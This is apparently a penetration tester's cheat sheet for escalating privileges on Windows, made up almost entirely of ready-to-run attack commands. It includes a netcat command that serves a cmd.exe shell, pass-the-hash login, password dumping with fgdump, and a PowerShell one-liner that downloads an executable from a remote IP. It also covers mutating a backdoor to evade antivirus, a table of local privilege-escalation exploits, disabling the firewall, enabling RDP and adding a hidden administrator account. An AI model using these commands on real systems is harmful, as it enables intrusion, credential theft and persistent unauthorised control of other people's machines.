Windows elevation of privileges

Getting a shell

$ system(“start cmd.exe /k $cmd”)

Getting a reverse shell

$ nc -Lp 31337 -vv -e cmd.exe

Find installed patches, architecture, OS version

$ systeminfo

Hostname.

$ hostname

Find current user.

$ echo %username%

List all users

$ net users

Information about a user

$ net users Administrator

Network information

$ ipconfig /all & route print & arp -a

List open connections

$ netstat -aton

Firewall information

$ netsh firewall show state
netsh firewall show config

List scheduled tasks

$ schtasks /query /fo LIST /v

List windows services

$ net start
$ wmic service list brief

Get permisions of all services. Services with full access from *BUILTIN\Users* can replace executable with malicious binary.

$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

Pass The Hash allows an attacker to authenticate to a remote target by using a valid combination of username and NTLM/LM hash rather than a cleartext password.

$ pth-winexe -U hash //$ip cmd

Dump passwords

$ fgdump.exe

If powershell is blocked, you can download:

https://github.com/Ben0xA/nps

Downloading files in Windows:

(new-object System.Net.WebClient).DownloadFile('http://1.1.1.1/file.exe','C:\Users\Administrator\Desktop\file.exe')

Once you know the updates installed, you can find known exploits using windows-exploit-suggester.

$ ./windows-exploit-suggester.py -d 2017-02-09-mssb.xls -p ms16-075
[*] initiating winsploit version 3.2…
[*] database file detected as xls or xlsx based on extension
[*] searching all kb’s for bulletin id MS16-075
[+] relevant kbs [‘3164038’, ‘3163018’, ‘3163017’, ‘3161561’]
[*] done
AV bypass

Generating a mutated binary to bypass antiviruses

$ wine hyperion.exe ../backdoor.exe ../backdoor_mutation.exe
Metasploit

Module to elevate privileges to SYSTEM by creating a service or hijacking existing ones with incorrect permissions

$ exploit/windows/local/service_permissions

Other scripts

https://github.com/GDSSecurity/Windows-Exploit-Suggester
https://github.com/Jean13/Penetration_Testing/blob/master/Privilege_Escalation/windows-privesc-check2.exe
Update & exploits
Exploit-DB Vuln Name             MS#         2K         XP      2003      2008    Vista 7
271     Lsasrv.dll            MS04-011    SP2/3/4    SP0/1    -         -            -        -
350     Util Manager          MS04-019    SP2/3/4    -        -         -            -        -
351     POSIX                 MS04-020    SP4        -        -         -            -        -
352     Univ lang. Util       Mgr         MS04-019   SP2/3/4  -         -            -        -
355     Univ lang. Util       Mgr         MS04-019   SP2/3/4  -         -            -        -
1149    PnP Service           MS05-039    P4         SP2      SP1       -            -        -
1197    keybd_event           -           all        all      all       -            -        -
1198    CSRSS                 MS05-018    SP3/4      SP1/2    -         -            -        -
1407    Kernel APC            MS05-055    SP4        -        -         -            -        -
1911    Mrxsmb.sys            MS06-030    all        SP2      -         -            -        -
2412    Windows Kernel        MS06-049    SP4        -        -         -            -        -
3220    Print spool service         -     -          All      -         -            -        -
5518    win32k.sys            MS08-025    SP4        SP2      SP1/SP2   SP0          SP0/SP1  -
6705    Churrasco             MS09-012    -          -        All       -            -        -
6705    Churraskito           -           -          All      All       -            -        -
21923   Winlogon NetDDE       -           All        All      -         -            -        -
11199   KiTrap0D/vdmallowed   MS10-015    All        All      All       All          All      All
14610   Chimichurri           MS10-059    -          -        -         All          All      SP0
15589   Task Scheduler        MS10-092    -          -        -         SP0/SP1/SP2  SP1/SP2  SP0
18176   AFD.Sys               MS11-080    -          SP3      SP3       -            -        -
100     RPC DCOM Long File    MS03-026    SP3/4      -        -         -            -        -
103     RPC2                  MS03-039    all (CN)   -        -         -            -        -
109     RPC2                  MS03-039    all        -        -         -            -        -
119     Netapi                MS03-049    SP4        -        -         -            -        -
3022    ASN.1                 MS04-007    SP2/3/4    SP0/1    -         -            -        -
275     SSL BOF               MS04-011    SP4        ?        -         -            -        -
295     Lsasarv.dll           MS04-011    SP2/3/4    SP0/1    -         -            -        -
734     NetDDE BOF            MS04-031    SP2/3/4    SP0/1    -         -            -        -
1075    Messaging Queue       MS05-017    SP3/4      SP0/1    -         -            -        -
1149    PnP Service           MS05-039    SP4        -        -         -            -        -
2223    Canonicalize Pathname MS06-040    -          SP1      -         -            -        -
2265    NetIPSRemote          MS06-040    SP0-4      SP0/1    -         -            -        -
2789    NetPManageIPCConn     MS06-070    SP4        -        -         -            -        -
7104    Service Code Exec     MS08-067    SP4        SP2/3    SP1/2     SP0          SP0/1    -
7132    Service Code Exec     MS08-067    SP4        -        SP2       -            -        -
14674   SRV2.SYS SMB          MS09-050    -         -         -         -            SP1/2    -
Useful commands

Enable RDP access

reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Disable firewall

$ netsh firewall set opmode disable

Add a new user

$ net user test 1234 /add
$ net localgroup administrators test /add
Get proof
$ echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Users\Administrator\Desktop\proof.txt" 2> nul & type "C:\Documents and Settings\Administrator\Desktop\proof.txt" 2> nul & type %USERPROFILE%\Desktop\proof.txt 2> null